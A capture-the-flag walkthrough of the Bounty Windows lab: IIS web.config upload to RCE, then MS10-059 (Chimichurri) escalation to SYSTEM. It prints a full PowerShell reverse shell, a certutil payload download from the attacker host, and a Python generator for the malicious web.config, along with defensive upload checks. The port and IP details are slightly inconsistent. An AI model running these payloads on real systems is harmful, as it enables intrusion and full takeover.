Bounty
Windows · Easy - Adventure mode
🔭 Reconnaissance:
```
└─$ nmap -p- -sSVC --min-rate 5000 10.129.21.8
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-01 16:40 +0200
Nmap scan report for 10.129.21.8
Host is up (0.046s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: Bounty
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.56 seconds
```
If we open the site, it only shows us an image of a wizard.
```
└─$ feroxbuster -u http://10.129.21.8 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories.txt -x aspx

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.129.21.8/
 🚩  In-Scope Url          │ 10.129.21.8
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [aspx]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET       29l       95w     1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET       32l      121w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        2l       10w      156c http://10.129.21.8/aspnet_client => http://10.129.21.8/aspnet_client/
200      GET       22l       58w      941c http://10.129.21.8/transfer.aspx
301      GET        2l       10w      156c http://10.129.21.8/uploadedfiles => http://10.129.21.8/uploadedfiles/
200      GET     1624l    16517w  1403476c http://10.129.21.8/merlin.jpg
200      GET       32l       53w      630c http://10.129.21.8/
301      GET        2l       10w      156c http://10.129.21.8/uploadedFiles => http://10.129.21.8/uploadedFiles/
301      GET        2l       10w      156c http://10.129.21.8/UploadedFiles => http://10.129.21.8/UploadedFiles/
200      GET       22l       58w      941c http://10.129.21.8/Transfer.aspx
301      GET        2l       10w      156c http://10.129.21.8/Aspnet_client => http://10.129.21.8/Aspnet_client/
301      GET        2l       10w      156c http://10.129.21.8/aspnet_Client => http://10.129.21.8/aspnet_Client/
200      GET       22l       58w      941c http://10.129.21.8/TRANSFER.aspx
```
This time I chose feroxbuster to look for files and directories. I'm not sure whether I'll end up using it more than dirsearch.

If we go to transfer.aspx we find an upload form. I first tried to upload a webshell through it, but that didn't work.
💣 Preparation:
After searching the Internet for a while I found what looks like a very simple way to fool the server; the strange part is that the server lets you upload this web.config file. The reason it works: IIS honours a web.config in any directory it serves, so a web.config dropped into the upload folder can re-map *.config to the classic ASP engine (asp.dll) and remove the request-filtering rules that normally hide the file. Requesting the uploaded web.config then executes the ASP code it carries. An upload form that only blocks the usual script extensions (.asp, .aspx, .exe and so on) does not stop this filename, which is consistent with the webshell upload failing while web.config goes through.
👽 Actions:
We upload the web.config and the server swallows it, which gives us RCE. We can use this webshell to get the first flag, ff24964fd5496ce4b***

```powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.154',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```
The payload I used and entered in the form, again taken from https://www.revshells.com/
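To make the web.config trick concrete, here is an added example (my code, not the web.config from this writeup or from any tool): a Python script that builds a web.config of the well-known IIS handler-remapping kind, checks it is well-formed before upload (IIS answers 500 for a broken one), pulls the command output back out of the served file, and contrasts the extension denylist that lets web.config through with an allowlist check that stops it. The command, the denylist/allowlist contents and the simulated server response are assumptions; the upload form's field names are not known from the page, so the HTTP upload itself is left out.

```python
import re
import xml.etree.ElementTree as ET

# Added example. The handler/request-filtering layout is the standard IIS
# web.config RCE pattern; the command is only a placeholder (assumption).

def build_web_config(command):
    """Return a web.config that, once it sits in a writable web directory, makes
    IIS (1) stop hiding/filtering *.config, (2) route *.config through the
    classic ASP engine (asp.dll), so that (3) the ASP block hidden inside the
    trailing XML comment runs `command` when the file itself is requested.
    preCondition="bitness64" matches a 64-bit app pool (the case here)."""
    if "--" in command or '"' in command:
        # '--' is illegal inside an XML comment; '"' would break the VBScript literal
        raise ValueError("command must not contain '--' or double quotes")
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\\system32\\inetsrv\\asp.dll"
           resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!--
<%
Response.Write("-" & "->")
Set sh = CreateObject("WScript.Shell")
Set ex = sh.Exec("cmd.exe /c {command}")
Response.Write(ex.StdOut.ReadAll())
Response.Write("<!-" & "-")
%>
-->
"""

def xml_is_wellformed(doc):
    """IIS refuses a malformed web.config (the whole directory then returns 500),
    so parse the file locally before uploading it."""
    try:
        ET.fromstring(doc)
        return True
    except ET.ParseError:
        return False

def extract_output(response_body):
    """asp.dll echoes the literal text and runs the <% %> block, whose
    Response.Write calls bracket the command's stdout with '-->' ... '<!--'.
    Returns that stdout, or None when the ASP did not execute (plain file served)."""
    m = re.search(r"-->(.*?)<!--", response_body, re.S)
    return m.group(1) if m else None

def simulate_asp_response(web_config, command_stdout):
    """Constructed stand-in for the server, used only for offline testing: the
    <% %> block is replaced by what its Response.Write calls would emit."""
    return re.sub(r"<%.*?%>", lambda _: "-->" + command_stdout + "<!--",
                  web_config, flags=re.S)

# Assumed lists: what a naive form checks, and what a fixed one should check.
EXTENSION_DENYLIST = {".asp", ".aspx", ".ashx", ".asmx", ".exe", ".ps1", ".bat"}
UPLOAD_ALLOWLIST = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".txt"}
RESERVED_NAMES = {"web.config", "global.asa", "global.asax"}

def _ext(name):
    i = name.rfind(".")
    return name[i:].lower() if i >= 0 else ""

def denylist_allows(filename):
    """The kind of check that lets web.config through: it only knows script extensions."""
    return _ext(filename) not in EXTENSION_DENYLIST

def upload_allowed(filename):
    """Allowlist check an upload handler should enforce server-side: strip any
    client-supplied path, refuse IIS configuration filenames, refuse trailing
    dots/spaces (Windows strips them on write) and accept only data extensions.
    Disabling script execution on the upload directory is the matching server fix."""
    name = re.split(r"[\\/]", filename)[-1].lower()
    if not name or name != name.rstrip(" ."):
        return False
    if name in RESERVED_NAMES:
        return False
    return _ext(name) in UPLOAD_ALLOWLIST

if __name__ == "__main__":
    cfg = build_web_config("whoami")
    print("well-formed:", xml_is_wellformed(cfg))
    print("denylist lets web.config through:", denylist_allows("web.config"))
    print("allowlist lets web.config through:", upload_allowed("web.config"))
```

The markers matter because the served response starts with the XML text verbatim; without them the command output would be hard to separate from the configuration that precedes it.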
Now we launch the reverse shell, copied once more from https://www.revshells.com/

```
PS C:\windows\system32\inetsrv> systeminfo
Host Name:                 BOUNTY
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter

PS C:\windows\system32\inetsrv> whoami /all

USER INFORMATION
----------------

User Name     SID
============= ==============================================
bounty\merlin S-1-5-21-2239012103-4222820348-3209614936-1000

GROUP INFORMATION
-----------------

Group Name                           Type             SID                                                           Attributes
==================================== ================ ============================================================= ==================================================
Everyone                             Well-known group S-1-1-0                                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545                                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                   Well-known group S-1-5-3                                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1                                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11                                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15                                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                    Alias            S-1-5-32-568                                                  Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0                                                       Mandatory group, Enabled by default, Enabled group
IIS APPPOOL\DefaultAppPool           Well-known group S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10                                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                  Mandatory group, Enabled by default, Enabled group

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

certutil -urlcache -split -f http://10.10.14.154/Chimichurri.exe
```

I gather system information to see the OS version and the current user's permissions. I also upload Chimichurri.exe. The two things worth noticing in that output are the IIS app-pool identity holding SeImpersonatePrivilege (and SeAssignPrimaryTokenPrivilege, even though it shows as Disabled; a process can enable a privilege its token already holds) and an OS banner with no service pack.
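As an added example that is not part of the writeup, the script below turns the whoami /all and systeminfo output above into a privilege-escalation triage: it parses which privileges the token holds (presence matters more than the Enabled/Disabled column), reads the NT version and the installed hotfixes, and flags the Chimichurri route only when SeImpersonatePrivilege is present and the MS10-059 hotfix (KB982799) is absent. The hotfix section of the sample is constructed, since the writeup only shows the first systeminfo lines.

```python
import re

# Constructed sample: the PRIVILEGES section from the whoami /all output above.
SAMPLE_WHOAMI = """PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Constructed sample: only the first two lines come from the writeup; the
# version and hotfix lines are assumed (no hotfixes installed) for the parser.
SAMPLE_SYSTEMINFO = """Host Name:                 BOUNTY
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
Hotfix(s):                 N/A
"""

MS10_059_KB = "KB982799"  # hotfix for the Tracing Feature bug Chimichurri exploits


def parse_privileges(whoami_output):
    """Map privilege name -> currently enabled, for every privilege present in
    the token. Presence is the useful signal: a 'Disabled' privilege can be
    switched on by the process itself (AdjustTokenPrivileges), so it counts."""
    privs = {}
    for line in whoami_output.splitlines():
        m = re.match(r"^(Se\w+Privilege)\s+.+?\s+(Enabled|Disabled)\s*$", line)
        if m:
            privs[m.group(1)] = m.group(2) == "Enabled"
    return privs


def parse_os_version(systeminfo_output):
    """Return (major, minor, build) from the 'OS Version:' line, or None."""
    m = re.search(r"^OS Version:\s+(\d+)\.(\d+)\.(\d+)", systeminfo_output, re.M)
    return tuple(int(x) for x in m.groups()) if m else None


def parse_hotfixes(systeminfo_output):
    """Collect every KBnnnnnn token in the systeminfo hotfix section."""
    return set(re.findall(r"\bKB\d{6,7}\b", systeminfo_output))


def triage(whoami_output, systeminfo_output):
    """Return the escalation routes suggested by the two outputs.
    'impersonation': token can impersonate (potato-family / MS10-059 style).
    'ms10-059': additionally NT 6.1 (Win7 / Server 2008 R2) and KB982799 missing,
    which is exactly what Chimichurri needs."""
    findings = []
    privs = parse_privileges(whoami_output)
    ver = parse_os_version(systeminfo_output)
    kbs = parse_hotfixes(systeminfo_output)
    can_impersonate = ("SeImpersonatePrivilege" in privs
                       or "SeAssignPrimaryTokenPrivilege" in privs)
    if can_impersonate:
        findings.append("impersonation")
    if can_impersonate and ver and ver[:2] == (6, 1) and MS10_059_KB not in kbs:
        findings.append("ms10-059")
    return findings


if __name__ == "__main__":
    print(parse_privileges(SAMPLE_WHOAMI))
    print(parse_os_version(SAMPLE_SYSTEMINFO), parse_hotfixes(SAMPLE_SYSTEMINFO))
    print(triage(SAMPLE_WHOAMI, SAMPLE_SYSTEMINFO))
```

Build 7600 only tells you the machine is pre-SP1; the hotfix list is what decides whether KB982799 is actually missing, so run the full systeminfo rather than the truncated version shown in the writeup.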
```
└─$ nc -lnvp 4444
listening on [any] 4445 ...
connect to [10.10.14.154] from (UNKNOWN) [10.129.22.213] 49161
```

We start the listener for the reverse shell.
```
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\users\merlin\Downloads>whoami
whoami
nt authority\system
```

Chimichurri does the job and we get a shell as NT AUTHORITY\SYSTEM. Chimichurri is the public exploit for MS10-059 (the Tracing Feature for Services privilege escalation, fixed by KB982799); it needs exactly the combination seen earlier: SeImpersonatePrivilege in the token and an unpatched Windows 7 / Server 2008 R2, and the banner version 6.1.7600 confirms a pre-SP1 build.